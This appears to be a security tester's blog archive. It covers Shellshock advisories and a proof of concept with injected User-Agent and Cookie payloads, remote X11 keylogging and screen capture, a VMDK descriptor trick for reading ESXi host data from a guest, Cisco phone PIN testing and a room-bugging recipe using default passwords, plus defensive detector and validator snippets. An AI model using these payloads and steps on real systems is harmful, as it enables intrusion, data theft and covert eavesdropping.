Sep 29, 2014

Current Intel on BashBug / Shellshock

CVE-2014-6271  (1st bug report)
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-7169   (2nd bug/variant, aka AfterShock)
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

CVE-2014-7186   (3rd bug/variant found by Red Hat's Florian Weimer)
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

CVE-2014-7187    (4th bug/variant found by Red Hat's Florian Weimer)
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

CVE-2014-6277   (5th bug/variant found by Google's Michal Zalewski)
Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

CVE-2014-6278   (6th bug/variant found by Google's Michal Zalewski)   (reserved, not available yet)
Variant 2. (see Variant 1 CVE-2014-6277 for a description)

From SANS Advisory Board: Only the first two listed above are patched in "mainstream" Linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

Other Info
GNU Patch Info
List for current bash (4.3):
Latest bash patch (027):


Network Detection (IDS, IPS, WAF)
  • VRT and EmergingThreats posts showing this is being addressed for Snort
  • ...

Bash Test Strings
Command line tests to verify proper patching (and possibly to reuse in our detections):
  • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
  • Later patch: foo='() { echo Not patched; }' bash -c foo
  • (search for more...)

Sep 25, 2014

POC for ShellShock / BashBug CVE-2014-6271

Ref CVE:

I tried real quick in a VM and it's easy to inject via user-agent and cookie headers. I didn't get much result via a GET parameter though (either via URL-encoding or by just encoding spaces), but I just wanted to prove the point for myself quickly...

Simple CGI Script on a vulnerable server

/usr/lib/cgi-bin$ cat
#!/bin/bash
# bash imports function definitions from the CGI environment (including the
# User-Agent and Cookie values) at startup, before any of these lines run.
echo -e "Content-type: text/plain\n\n"
echo "hi ya! Is there a file in /tmp as a result of this?"
echo "Output from env:"
env   # assumed: the response below shows "Output from env:" followed by the environment dump

GET request from attacker

GET /cgi-bin/ HTTP/1.1
Host: localhost
Content-Length: 0
User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
Connection: keep-alive

GET response received by attacker

HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 23:42:53 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 1866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

hi ya! Is there a file in /tmp as a result of this?
Output from env:

Result on attacked server

$ ls /tmp/Hacked*
/tmp/HackedViaCookie /tmp/HackedViaUserAgent
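As an added example, not part of the original post: a small Python detector in the spirit of the Snort/ET signatures listed under Network Detection, run over the POC request above. It flags header values that start with the `() {` function-definition prefix the test strings rely on; the script path in the sample request is a placeholder.

```python
import re
from urllib.parse import unquote

# The test strings rely on bash's function-import prefix "() {". The regex below is what an
# IDS/WAF rule boils down to: the prefix at the very start of a value, tolerating optional
# whitespace before the brace (slightly broader than bash's exact 4-byte check).
SHELLSHOCK_PREFIX = re.compile(r"\(\)\s*\{")


def looks_like_shellshock(value: str) -> bool:
    """True if a header or parameter value starts with a bash function definition.
    The value is percent-decoded once, since CGI parameters may arrive URL-encoded."""
    return SHELLSHOCK_PREFIX.match(unquote(value)) is not None


def parse_request_headers(raw: str) -> dict:
    """Minimal parser for the head of a raw HTTP/1.x request: header name -> value
    (names lower-cased, insertion order preserved). The request line is skipped."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    headers = {}
    for line in head.splitlines()[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def scan_request(raw: str) -> list:
    """Names of the headers in a raw request whose values carry the Shellshock prefix."""
    return [name for name, value in parse_request_headers(raw).items()
            if looks_like_shellshock(value)]


# Constructed sample: the POC request from the post (the script path is a placeholder).
SAMPLE_REQUEST = (
    "GET /cgi-bin/example.cgi HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Content-Length: 0\r\n"
    "User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print("flagged headers:", scan_request(SAMPLE_REQUEST))
```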

May 1, 2014

Getting started in web services testing with SoapUI and Mutillidae

I wrote this article to help anyone who wants to start using SoapUI to check the security of (SOAP) web services. To do so, we first set up Mutillidae, which contains a few services to test. Then we run a SQL injection test.

Sorry for the English; I don't really have the time to translate it. But a picture is worth a thousand words, isn't it?

This post is meant to help a security tester set up SoapUI and use it against the test web services included in Mutillidae.

Setting up a local test environment with web services

Setting up SoapUI

  • Set up SoapUI, create a test project for Mutillidae, load the various Mutillidae WSDL files and set up the associated test suites for each WSDL:
  • As a simple test, double-click getUserInformation and add username and password values as follows:

  • Click on the green Submit Request button and wait for the response in the right pane:

Creating a security test

  • Create a new Security Test:

  • Optionally, add another specific assertion, as demonstrated below.

Note that adding an XPath assertion when testing for many injection issues may not be a good idea. At the very least, you have to ensure that the assertion will cover all the cases. For example, below, we add an XPath expression that covers both the case of a normal request (node count = 1) and the case of an empty result set (node count = 0).

Running the test

Inspecting the results
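Added example (not from the original post, and not SoapUI's own code): the assertion logic described above, reproduced in Python over three constructed getUserInformation responses. The namespace and element names are assumptions; it shows why a `count = 1` assertion alone fails on a legitimate empty result, while the `0 or 1` version still flags a response that returns every record.

```python
import xml.etree.ElementTree as ET

# Constructed sample responses. The namespace and element names are assumptions, not
# Mutillidae's actual schema; only the number of result nodes matters here.
NS = "urn:example:users"


def _envelope(usernames):
    records = "".join(f"<u:account><u:username>{u}</u:username></u:account>" for u in usernames)
    return (
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" '
        f'xmlns:u="{NS}"><soap:Body><u:getUserInformationResponse>'
        f"{records}</u:getUserInformationResponse></soap:Body></soap:Envelope>"
    )


NORMAL_RESPONSE = _envelope(["admin"])                      # valid credentials: one record
EMPTY_RESPONSE = _envelope([])                              # wrong credentials: no record
INJECTED_RESPONSE = _envelope(["admin", "adrian", "john"])  # injection returned every record


def account_count(xml_text: str) -> int:
    """Equivalent of the XPath count(//u:account) on a response."""
    root = ET.fromstring(xml_text)
    return len(root.findall(f".//{{{NS}}}account"))


def naive_assertion(xml_text: str) -> bool:
    """'count = 1' only: a legitimate empty result set is reported as a failure too."""
    return account_count(xml_text) == 1


def tolerant_assertion(xml_text: str) -> bool:
    """The assertion described in the post: a normal request (count = 1) and an empty
    result set (count = 0) both pass; any other shape of response is a failure to look at."""
    return account_count(xml_text) in (0, 1)


def evaluate(assertion) -> dict:
    """Run an assertion over the three sample responses; False marks a failed assertion."""
    samples = (("normal", NORMAL_RESPONSE), ("empty", EMPTY_RESPONSE),
               ("injected", INJECTED_RESPONSE))
    return {name: assertion(xml) for name, xml in samples}


if __name__ == "__main__":
    print("count = 1 only :", evaluate(naive_assertion))
    print("count in (0, 1):", evaluate(tolerant_assertion))
```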

Dec 16, 2013

Acquiring memory with Dumpit

Nov 13, 2013

Headless intercepting proxy

Here are the usable options I know of for intercepting HTTP traffic when all you have is an isolated Kali Linux box (accessed via SSH, with no X/VNC access option and no Internet access):
For example, one can use the scrolling (dump) mode while capturing, saving the HTTP flows to a file. Afterwards, the flow details are viewed in full-screen mode:
# mitmdump -w /var/log/mitmdump-$$.log -v -p 8080
GET
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
    If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"

 << 304 Not Modified 0B

    Expires: Wed, 13 Nov 2013 17:30:43 GMT
    Date: Wed, 13 Nov 2013 17:30:43 GMT
    Cache-Control: private, max-age=0
    ETag: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
    Server: GSE

# mitmproxy -r /var/log/mitmdump-3099.log
>> GET
← 304 [empty content]

2013-11-13 12:30:43 GET
← 304 [empty content]
Request                                   Response
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
2013-11-13 12:30:43 GET
                        ← 304 [empty content]
Request                                  Response
Expires:        Wed, 13 Nov 2013 17:30:43 GMT
Date:           Wed, 13 Nov 2013 17:30:43 GMT
Cache-Control:  private, max-age=0 
ETag:           "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
Server:         GSE

These other options also offer a "headless" mode but are not as simple to use:
  • Zed Attack Proxy with the "-daemon" option. In my experience, you have to know how to edit the proxy's XML configuration files to get what you want. Not the most attractive option.
  • Burp with the -Djava.awt.headless=true option. Scripts that use this option: and bscan
  • Proxystrike with the -c (console) option - not sure whether this option is really usable...
  • Metasploit socks4a auxiliary server:
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > info

Name: Socks4a Proxy Server
Module: auxiliary/server/socks4a
Version: 0
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST                   yes       The address to listen on
SRVPORT  1080             yes       The port to listen on.

This module provides a socks4a proxy server that uses the builtin
Metasploit routing to relay connections.

msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > jobs

Id  Name
--  ----
0   Auxiliary: server/socks4a

Nov 12, 2013

Scanning sites protected against CSRF attacks

To allow scanning of sites protected against cross-site request forgery (CSRF) attacks, a Burp plugin was developed (proof of concept). It can be found here

Taken from an article on
In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially, as each request contains a newly generated anti-CSRF token needed for the next request, forming a token chain.

A POC in the form of a Burp Suite plugin has been developed to verify this approach; it can be downloaded at It should be noted, however, that this code is a POC and it requires further development in order to be able to work against real environments (any link to a web app with this behaviour is appreciated).

Original post origin:
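Added example, not the article's or the plugin's code: a server-side model in Python of the token chain described above. It shows why requests must be sequential: reusing one captured token is rejected from the second request on. All names are constructed.

```python
import hmac
import secrets


class TokenChainSession:
    """Server-side model of the defence the article describes: every response carries a
    fresh anti-CSRF token, and a request is accepted only with the token from the response
    immediately before it. Constructed for illustration; not the Burp plugin's code."""

    def __init__(self):
        self.expected = secrets.token_hex(16)
        self.accepted = 0

    def page(self) -> dict:
        """GET of the form: the client must read the token out of this response."""
        return {"status": 200, "csrf_token": self.expected}

    def submit(self, token: str) -> dict:
        """State-changing request: verify the token, rotate it, hand out the next one."""
        if not hmac.compare_digest(token, self.expected):
            return {"status": 403, "csrf_token": None}  # stale, reused or forged token
        self.accepted += 1
        self.expected = secrets.token_hex(16)
        return {"status": 200, "csrf_token": self.expected}


def sequential_requests(n: int) -> list:
    """Walk the token chain the way the article requires: each request carries the token
    from the previous response. Returns the status codes seen."""
    session = TokenChainSession()
    token = session.page()["csrf_token"]
    statuses = []
    for _ in range(n):
        response = session.submit(token)
        statuses.append(response["status"])
        token = response["csrf_token"]
    return statuses


def replayed_requests(n: int) -> list:
    """What a scanner that captures one token and reuses it for every request gets:
    only the first request is accepted, every later one is rejected."""
    session = TokenChainSession()
    token = session.page()["csrf_token"]
    return [session.submit(token)["status"] for _ in range(n)]


if __name__ == "__main__":
    print("sequential:", sequential_requests(3))
    print("replayed:  ", replayed_requests(3))
```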

Jul 25, 2013

Preserving HTML line breaks in Excel (without an extra row)

Here is a common problem: you want to import an HTML table into Excel without Excel interpreting the <BR> line-break tags as a row change, which makes the sort and filter functions unusable. In my opinion, not having any flexibility on this from the Excel user interface is a bug!

The simplest solution is to add a Microsoft-specific style (in the HTML file) as follows:

<html>... <style> br { mso-data-placement:same-cell; } </style> ...</html>

Thanks to Michu (24/7 dev & coffee blog) for the tip!

Ref: Generating Excel files from web - line breaks in cells 

Thanks to Michu for the great tip... Initial text copied here for convenience...

Generating Excel files from web - line breaks in cells

...I needed to wrap text in a cell, but when I put the tag into the HTML output, Excel interpreted it as a new row, not a line break in the existing cell. The solution I found is to add this to a stylesheet:
    br {mso-data-placement:same-cell;}

Jan 11, 2013

Attacking an X11 server without authentication (after xhost +)

Here are a few commands for exploiting an open X11 server:

Remote key capture
$ xkey IP:0.0

  • The source code for xkey.c can be found here
  • Use 0.0 for port 6000, 1.0 for port 6001, ...
Screen capture:
$ xwd -display IP:0.0 -root -silent -out /tmp/screendump
$ xv /tmp/screendump 
$ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


Dec 2, 2012

Analysis of Android app traffic through Burp Suite

Good summary here

Related articles

Nov 23, 2012

Forcing Firefox to remember passwords

The Firefox configuration setting wallet.crypto.autocompleteoverride allows overriding autocomplete="off" so that passwords are always remembered. This may be useful where Greasemonkey isn't available (e.g. on Android). I'll need to test this...

Of course, this needs to be used with caution (on a test system, if Firefox isn't the default browser...).

As said, on a desktop, a better option is to use a Greasemonkey script or modify the nsLoginManager.js file.

Ref: Wallet.crypto.autocompleteoverride - MozillaZine Knowledge Base

Oct 22, 2012

Stealing host data from a VMware vSphere 5.0 VM

This post is inspired by the Insinuator site's presentation on an attack on public IaaS clouds (+ follow-up post) that support VM uploads and are based on VMware ESXi 5.0. Essentially, it's about a VM guest being able to read files on the ESXi host after abusing a VMDK descriptor file's content.

I wanted to check if this is really a problem (i.e. the whole attack path being valid) or if this post was just something half-baked or simple "food for thought".

Reproducing this in my own environment 

Here, I'll try to reproduce what the above post did while checking that this is really a problem with VMware. I mean, this will only be a problem if exporting/importing the VM to/from OVF format works. In other words, if VMware performs clean-up/validation while deploying OVF files, this alleged vulnerability may be irrelevant.

Test Environment: ESXi 5.0.0 (#1 SMP Release build-474610 Aug 26 2011 13:51:17 x86_64)

Step 1: Simulate the stealing of the host's volume details from a Debian guest

On ESXi host:
  • Connect to the ESXi server using VMware vSphere Client 5.0
  • Create a small Debian 6.0.3 Server VM
  • SSH to the ESXi hypervisor (the SSH server has to be turned on). Here we work on the host's files directly instead of exporting them to a different format (e.g. OVF, OVA, ...) and then reimporting them.
  • Edit the resulting vmdk descriptor file (on the ESXi host directly). The added line is the second RW extent (state.tgz):
/vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
# Disk DescriptorFile

# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 32 VMFS "/bootbank/state.tgz"[...]
  • Back in the vSphere client, start the Debian VM
  • SSH to the VM or use the vSphere Client to get into the VM's console
  • Multiply the VMFS extent size above by the block size of 512: 2097152 * 512 = 1073741824 (OFFSET)
  • Create a new loopback device that starts right after the flat VMDK extent: losetup -v -o OFFSET -f /dev/sda
  • Use the loopback device to extract the data: tar -x -i --ignore-command-error --ignore-failed-read -z -f /dev/loop0
  • Extract the files in the inner gzip package: tar -x -i --ignore-command-error --ignore-failed-read -z -f local.tgz [screenshot of above steps]
  • Examine the content of the extracted data. Get the device file name from etc/vmware/esx.conf (naa...) [screenshot]
Good! We can get host volume details from a guest!

Step 2: Simulate the stealing of a host's volume content from a Debian guest
  • In the host's console session, change the vmdk descriptor file as follows (the added line is the VMFSRAW extent), taking into consideration the volume details obtained before:
/vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
# Disk DescriptorFile

# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 8386560 VMFSRAW "/dev/disks/naa.600508b1001c1bd269ddc2f549010bad:2"
  • Restart the VM and reestablish a shell session to it
  • View the data of the volume [screenshot]

NB: Although the above steps successfully demonstrated how a guest could abuse access to data on the host, I could not reproduce the same thing by creating a portable OVF package that could be deployed to the host from a remote vSphere client (simulating a malicious IaaS customer).

However, my testing wasn't exhaustive. I didn't try to craft an OVF package taking the above into consideration. Somehow, I can't imagine that the deployment of such a package (with an absolute path pointing to a known host file/device) would work. Perhaps I should have thought of that before I started all this testing!

Nevertheless, it's not completely impossible that a cloud provider would use a different portable format that would allow this attack vector to work.
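Added example (not VMware's or the Insinuator post's code): a Python parser for the descriptor's extent lines that computes each extent's starting offset the way OFFSET was computed above (sectors * 512), plus the kind of validation the NB speculates about, refusing absolute paths, parent-directory traversal and VMFSRAW device mappings. The sample descriptors reproduce the two extent lists from the steps above.

```python
import re
from pathlib import PurePosixPath

# Extent line of a VMDK descriptor: <access> <size in sectors> <type> "<path>" [offset]
EXTENT_RE = re.compile(r'^(RW|RDONLY|NOACCESS)\s+(\d+)\s+(\w+)\s+"([^"]+)"(?:\s+\d+)?$')
SECTOR_SIZE = 512  # the block size used in the post's OFFSET computation


def parse_extents(descriptor_text: str) -> list:
    """List the extents with the byte offset at which each one starts inside the virtual
    disk as the guest sees it (sectors before it * 512), i.e. the post's OFFSET."""
    extents, cursor = [], 0
    for line in descriptor_text.splitlines():
        m = EXTENT_RE.match(line.strip())
        if not m:
            continue  # comments, DDB entries and blank lines
        access, sectors, extent_type, path = m.groups()
        extents.append({"access": access, "sectors": int(sectors),
                        "type": extent_type, "path": path, "offset": cursor})
        cursor += int(sectors) * SECTOR_SIZE
    return extents


def suspicious_extents(descriptor_text: str) -> list:
    """Extents an import/deploy step should refuse before registering the disk: any path
    that is absolute or escapes the VM directory, and any raw device mapping (VMFSRAW)."""
    findings = []
    for ext in parse_extents(descriptor_text):
        path = PurePosixPath(ext["path"])
        reasons = []
        if path.is_absolute():
            reasons.append("absolute path")
        if ".." in path.parts:
            reasons.append("parent-directory traversal")
        if ext["type"].upper() == "VMFSRAW":
            reasons.append("raw device mapping")
        if reasons:
            findings.append((ext["path"], reasons))
    return findings


# Constructed sample input: the descriptor extent lines quoted in step 1 and step 2.
STEP1_DESCRIPTOR = """# Disk DescriptorFile
# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 32 VMFS "/bootbank/state.tgz"
"""
STEP2_DESCRIPTOR = """# Disk DescriptorFile
# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 8386560 VMFSRAW "/dev/disks/naa.600508b1001c1bd269ddc2f549010bad:2"
"""

if __name__ == "__main__":
    for ext in parse_extents(STEP1_DESCRIPTOR):
        print(f"{ext['offset']:>12}  {ext['type']:<8} {ext['path']}")
    print("step 1 findings:", suspicious_extents(STEP1_DESCRIPTOR))
    print("step 2 findings:", suspicious_extents(STEP2_DESCRIPTOR))
```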

Oct 19, 2012

Web credential stealing (even HTTPS) via Windows event traces

Mark Baggett found a way to extract web session details (even for sessions using SSL), including the user name and password, by turning on Event Tracing for Windows (ETW) on a Windows target (i.e. as a post-exploitation tool). The details are on the PaulDotCom wiki, in the show notes for Episode300 - PaulDotCom Security Weekly. NB: this method has prerequisites (WinInet API usage).

Oct 16, 2012

Montreal Java User Group

The Montreal Java User Group (JUG) is a group of Java users that meets regularly to exchange ideas and discuss technological advances in the Java platform.

Oct 14, 2012

Cisco IP Telephony security auditing ideas

Here are some ideas for security auditing a Cisco IP Telephony solution.

Password Auditing

Web UI

Use Burp to send POST requests (for all users) to the Cisco Call Manager login form at https://.../ccmuser/

IP phone PIN 

A programmatic approach to testing the phone PIN is described here:

NB: I haven't done that test automatically to avoid problems (in Prod), but I think the clean sequence required looks like this:
  • Get SIDVAL: /ccmpd/
  • Try logging in -- if we get XML without an error, we're good; set the PIN value to your org's default: /ccmpd/
  • Initiate logout: /ccmpd/
  • Confirm logout and close the session: /ccmpd/


Test other URIs used by Cisco IP phones

  • http://.../ccmcip/xmldirectory.jsp 
  • http://.../ccmcip/getservicesmenu.jsp 
  • http://.../ccmcip/GetTelecasterHelpText.jsp 
  • http://.../ccmcip/authenticate.jsp

Check if IP Phones can be used to remotely bug a (conference) room 

Another test idea is to check whether listening in on remote conversations is possible because of unchanged defaults. This is described here

Excerpt from the above reference (in case the above post disappears):
There exists an interesting “feature” in Cisco IP phones that allows a crafty user to remotely control a Cisco IP phone and set it to call a remote number (if setup to do so) and allow audio to stream normally — in effect allowing someone to remotely audio bug a room. In all fairness, this feature requires the controlling user to know the configured password for the phone which many installations leave the default password of “cisco” set.

To try this out:
  1. Telnet to the phone (e.g. “telnet”). You may need to bridge your PC to the IP Phone VLAN from within the office (see,2, use the VLAN as determined from an IP phone's settings, e.g. VLAN 161, IP:, DHCP server:, Host Name: SEPD0C282439930)
  2. Enter the password for the phone. At the “SIP Phone>” prompt, start a “test” session with “test open”
  3. Virtually take the phone off the hook with “test offhook”
  4. Virtually dial the telephone number where the audio stream should go with “test key ” (e.g. “test key 14155556666”)
  5. The phone will start to make the call… Switch to speakerphone with “test key spkr” (to virtually push the Speakerphone key)
  6. Listen to the audio streaming from the phone…

Sep 6, 2012

SANS presentations on user awareness

SANS has made presentations available to raise IT users' awareness of information security. At least one already exists in French.
SANS Security Awareness Presentations:
Securing The Human: takes you step by step how to build a high-impact awareness program that ensures your organization is not only compliant but secure by changing human behavior. Topics include building your Steering Committee, identifying WHO you are targeting in your program, WHAT you want to communicate and HOW. In addition we cover key topics such as updating your program and how to measure it through effective metrics.
Securing The Kids: for parents to help better understand and how to protect their kids online. We cover the top three risks kids face online and the top five steps you can take to protect them. This course is based on the experiences and lessons learned from a variety of SANS top instructors who not only specialize in security, but are parents just like you.
Internet Security Guide For Kids: for parents to present to K-5th graders on how they can safely use the Internet. The information here is similar to the lessons learned in Securing The Kids, but presented in a graphical, kid-friendly manner.

Aug 7, 2012

Configuring Nessus for web application scans

When using Nessus to scan a web site, it is important to configure the global settings properly in order to find as many vulnerabilities as possible.
Tenable's support site has a good article explaining how to do this. I have copied the details below (in English).

  • Cookies can be imported to facilitate pre-authenticated access
  • To obtain a file containing active cookies, use Firefox and export its cookies via an add-on such as Export Cookie
  • It is also very important to adjust a few settings in Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, add scan starting points in Web Mirroring (+ use plugins that rely on these settings)


What needs to be configured to ensure a thorough web application audit is performed by Nessus?


Tenable encourages users to run a full vulnerability scan with all plugins enabled. If you want to streamline a policy to only focus on a web application, the following steps outline the process for creating a new policy designed to run a web application audit:
  1. Create a new policy. (Policies -> Add)
  2. Under the “General” tab options, set up a scan as you normally would. Ensure at least one TCP-based port scanner is selected and provide a list of ports with web servers running on the host(s). Note: Only use this method if you are absolutely sure you know of all web servers running on the targets. Otherwise, select a port range so that Nessus can detect web servers and applications to audit.
  3. Under the “Plugins” tab, ensure the following plugin families are enabled:
    1. CGI abuses – This plugin family checks for a wide range of commercial and open source applications that have documented vulnerabilities. These checks include software detection, information disclosure, SQL injection, file inclusion, overflows and more.
    2. CGI abuses : XSS – This plugin family checks for a wide range of commercial and open source applications that have documented Cross-site Scripting (XSS) vulnerabilities.
    3. Database – Many web applications will utilize a database for storing large amounts of data. SQL injection attacks are designed to target database servers via web applications.
    4. FTP – Some sites use FTP for administrators to upload web application content or update the application.
    5. General – This plugin family contains plugins that identify operating systems via HTTP, perform a wide variety of SSL checks and more.
    6. Service detection – Contains checks for a wide variety of services and technologies, many of which support web servers and applications.
    7. Web servers – This plugin family contains over 500 checks for vulnerabilities in popular web servers including Apache, Tomcat, IIS and WebSphere. In addition, this plugin family includes checks for frameworks such as PHP, common web server issues associated with the HTTP(S) protocol, OpenSSL checks and more.
  4. Under the “Preferences” tab, there are several drop-down menus with additional configuration options that must be specified:
    1. Under “Global variable settings”, select “Enable CGI scanning”. Optionally, the “Thorough tests (slow)” can be enabled and “Report verbosity” can be set to “Verbose” to provide additional vulnerability checks and better reporting.
    2. The “HTTP cookies import” drop-down can be used to import cookies as a means for authenticating to the application. This is not explicitly required, but some means of authentication should be provided.
    3. The “HTTP login page” drop-down provides over a dozen options that direct Nessus to a custom web application. This includes the URL to the login page (e.g., /application/login.php), login form (i.e., if the login data is sent to a different location), relevant form fields for authentication (the “user” and “pass” variables should be changed to reflect your application, %USER% and %PASS% are pulled from the “Login configurations” drop-down menu) and options that control how Nessus behaves in relation to the authentication process.
    4. The “Login configurations” can be used if the application is protected using HTTP Basic Authentication, Digest or NTLM.
    5. The “Web Application Tests Settings” drop-down contains several important options for enabling testing of custom applications. The “Enable web applications tests” must be enabled, or Nessus will only scan for known vulnerabilities based on prior public disclosures. This page also contains options for limiting the time to test an application, use of POST requests, the type of argument values to use (refer to the Nessus User Guide for additional information on this option) and more.
    6. The “Web mirroring” drop-down directs Nessus’ behavior for mirroring the application, a step performed before tests are calculated and run. The total number of pages or depth of mirroring can be controlled, along with the starting page and a delimited list of regular expressions that are used to match web pages that Nessus will exclude (e.g., logout|emailus.php).
For more information about the settings you can watch our instructional videos at:
Additionally, you can find detailed information on the preferences in the Nessus User Guide.
Other Refs:
  • From the Discussions Forum, another related post regarding the use of cookie importing:
  • The missing link in the Nessus docs is that to get the cookie file, you need to use Firefox and export using an add-on such as:
  • Also very important is to tweak a few settings in Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, Web Mirroring starting points (+ choose some plugins that use these)
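Added example, not from the original post or from Tenable: a Python stand-in for the Firefox export add-on mentioned above, converting a profile's cookies.sqlite into the Netscape cookies.txt layout (assumed here to be what the HTTP cookies import preference expects, since that is what the add-on produces). The in-memory sample table and its rows are constructed.

```python
import sqlite3

NETSCAPE_HEADER = "# Netscape HTTP Cookie File"
SAMPLE_NOW = 1_400_000_000  # fixed "current time" so the constructed sample is reproducible


def firefox_cookies_to_netscape(con: sqlite3.Connection, now: int) -> str:
    """Convert the moz_cookies table of a Firefox cookies.sqlite into Netscape cookies.txt
    text. Expired cookies are dropped so the scanner is not fed dead session identifiers."""
    rows = con.execute(
        "SELECT host, path, isSecure, expiry, name, value FROM moz_cookies ORDER BY host, name"
    ).fetchall()
    lines = [NETSCAPE_HEADER]
    for host, path, is_secure, expiry, name, value in rows:
        if expiry < now:
            continue
        # Netscape layout: domain, include-subdomains flag, path, secure, expiry, name, value
        lines.append("\t".join([
            host,
            "TRUE" if host.startswith(".") else "FALSE",
            path,
            "TRUE" if is_secure else "FALSE",
            str(expiry),
            name,
            value,
        ]))
    return "\n".join(lines) + "\n"


def open_profile_db(path: str) -> sqlite3.Connection:
    """Read-only connection to a profile's cookies.sqlite (Firefox keeps the file locked
    while it runs, so copy it out of the profile first and point this at the copy)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for cookies.sqlite with only the columns used above
    (the real moz_cookies table has more)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE moz_cookies (host TEXT, path TEXT, isSecure INTEGER, "
                "expiry INTEGER, name TEXT, value TEXT)")
    con.executemany("INSERT INTO moz_cookies VALUES (?, ?, ?, ?, ?, ?)", [
        (".app.example.test", "/", 1, SAMPLE_NOW + 3600, "PHPSESSID", "constructed-session-id"),
        ("app.example.test", "/admin", 1, SAMPLE_NOW + 86400, "remember", "constructed-token"),
        ("app.example.test", "/", 0, SAMPLE_NOW - 60, "stale", "expired-value"),
    ])
    con.commit()
    return con


def demo_cookie_file() -> str:
    """The cookies.txt content Nessus would be given for the constructed sample profile."""
    return firefox_cookies_to_netscape(build_sample_db(), SAMPLE_NOW)


if __name__ == "__main__":
    print(demo_cookie_file(), end="")
```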

May 22, 2012

How to clone a SecurID software token

